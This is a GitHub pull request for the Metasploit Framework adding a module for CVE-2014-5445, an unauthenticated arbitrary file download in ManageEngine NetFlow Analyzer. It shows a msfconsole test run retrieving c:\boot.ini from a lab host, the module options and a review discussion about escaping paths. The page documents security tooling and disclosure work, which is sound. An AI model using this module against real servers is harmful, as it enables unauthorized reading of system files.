Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit for CVE-2014-5445, NetFlow Analyzer arbitrary download #4282

Merged
merged 4 commits into from Dec 12, 2014
Merged

Add exploit for CVE-2014-5445, NetFlow Analyzer arbitrary download #4282

merged 4 commits into from Dec 12, 2014

Conversation

pedrib
Copy link
Contributor

@pedrib pedrib commented Nov 30, 2014

This PR adds an exploit for CVE-2014-5445, a 0-day vulnerability in ManageEngine NetFlow Analyzer that allows an unauthenticated user to download any file in the system. This works on both Linux and Windows, and has been tested extensively with all vulnerable versions (8.6 to 10.2).

All that is left is to add the OSVDB ID and the full disclosure URL, and as usual those come up in 2 or 3 days max. I will push those when they come up, please have a look and let me know what you think.

@jvazquez-r7 jvazquez-r7 self-assigned this Dec 1, 2014
@jvazquez-r7
Copy link
Contributor

Thanks @pedrib !! See pedrib#11 It's doing minor cleanup for #4282. Feel free to review and land once ready. I'll wait for you to add the OSVDB and FULLDISC url's and it will be ready to go!

Thanks!

Test after cleanup:

msf auxiliary(netflow_file_download) > reload
[*] Reloading module...
run
msf auxiliary(netflow_file_download) > run

[*] 172.16.158.138:8080 - Downloading file c:\boot.ini
[+] 172.16.158.138:8080 - File saved in: /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini
[*] Auxiliary module execution completed
msf auxiliary(netflow_file_download) > show options

Module options (auxiliary/admin/http/netflow_file_download):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   c:\boot.ini      yes       Path of the file to download (escape Windows paths with 2 back slashes)
   Proxies                     no        Use a proxy chain
   RHOST      172.16.158.138   yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /netflow         yes       The base path to NetFlow Analyzer
   VHOST                       no        HTTP server virtual host

msf auxiliary(netflow_file_download) > cat /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini
[*] exec: cat /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
msf auxiliary(netflow_file_download) > loot

Loot
====

host            service  type          name         content                   info  path
----            -------  ----          ----         -------                   ----  ----
172.16.158.138           netflow.http  c:\boot.ini  application/octet-stream        /Users/jvazquez/.msf4/loot/20141130185926_test_netflow_172.16.158.138_netflow.http_184735.ini

msf auxiliary(netflow_file_download) >

@jvazquez-r7 jvazquez-r7 removed their assignment Dec 1, 2014
@pedrib
Copy link
Contributor Author

pedrib commented Dec 1, 2014

Thanks, merged! I'll add the links as soon as they show up.

@todb-r7 todb-r7 changed the title Add exploit for CVE-2014-5445 Add exploit for CVE-2014-5445, NetFlow Analyzer arbitrary download Dec 1, 2014
@pedrib
Copy link
Contributor Author

pedrib commented Dec 7, 2014

OSVDB and full disclosure links added, it's good to go!

@jvazquez-r7
Copy link
Contributor

Thanks @pedrib , landing!

@jvazquez-r7 jvazquez-r7 merged commit 98e416f into rapid7:master Dec 12, 2014
jvazquez-r7 added a commit that referenced this pull request Dec 12, 2014
@todb-r7
Copy link

todb-r7 commented Dec 18, 2014

@jvazquez-r7 @pedrib In your example here, you have:

FILEPATH   c:\boot.ini      yes       Path of the file to download (escape Windows paths with 2 back slashes)

Though I can't help but notice that you're not escaping the slashes here.

What should the user really be typing? C:\boot.ini or C:\\boot.ini or C:\\\boot.ini ?

@jhart-r7
Copy link
Contributor

And I only just noticed this now, but C:\boot.ini isn't a safe default value, IMO, since boot.ini isn't present since Windows 7. C:\windows\system.ini is probably a better default.

@todb-r7
Copy link

todb-r7 commented Dec 18, 2014

I'd be happy to have the default be system.ini and have the correct number of slashes. I just want to shorten that option description -- right now it's really long and already taken care of in the main description.

thx @jhart-r7

@pedrib
Copy link
Contributor Author

pedrib commented Dec 18, 2014

@todb-r7 in a Linux prompt you have to type 4 back slashes
filepath=C:\boot.ini, hence why in the original commit it said so and had such an example.

@todb
Copy link
Contributor

todb commented Dec 18, 2014

Right, but now I'm confused what the user should be typing in the datastore option. The screen shot has no double slashes.

@pedrib
Copy link
Contributor Author

pedrib commented Dec 18, 2014

I think - but correct me if I'm wrong - that two slashes are to escape in
the shell and the other two bashes for ruby.
On 18 Dec 2014 20:43, "Tod Beardsley" notifications@github.com wrote:

Right, but now I'm confused what the user should be typing in the
datastore option. The screen shot has no double slashes.


Reply to this email directly or view it on GitHub
#4282 (comment)
.

@todb-r7
Copy link

todb-r7 commented Dec 18, 2014

Okay. So if I'm in msfconsole, or an rc script, I need two slashes, and that's just for Ruby.

msf auxiliary(netflow_file_download) > set FILEPATH c:\\boot.ini
FILEPATH => c:\boot.ini

I was confused about the directive for two slashes because I read it as you'd need something like:

msf auxiliary(netflow_file_download) > set FILEPATH c:\\\\boot.ini
FILEPATH => c:\\boot.ini

I assume this is not what you intended.

todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Dec 18, 2014
@todb-r7 todb-r7 mentioned this pull request Dec 18, 2014
1 task
@todb-r7
Copy link

todb-r7 commented Dec 18, 2014

@pedrib feel free to comment on #4426 -- I think this is what you intended.

@pedrib pedrib deleted the netflow_file_dl branch February 1, 2017 00:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

5 participants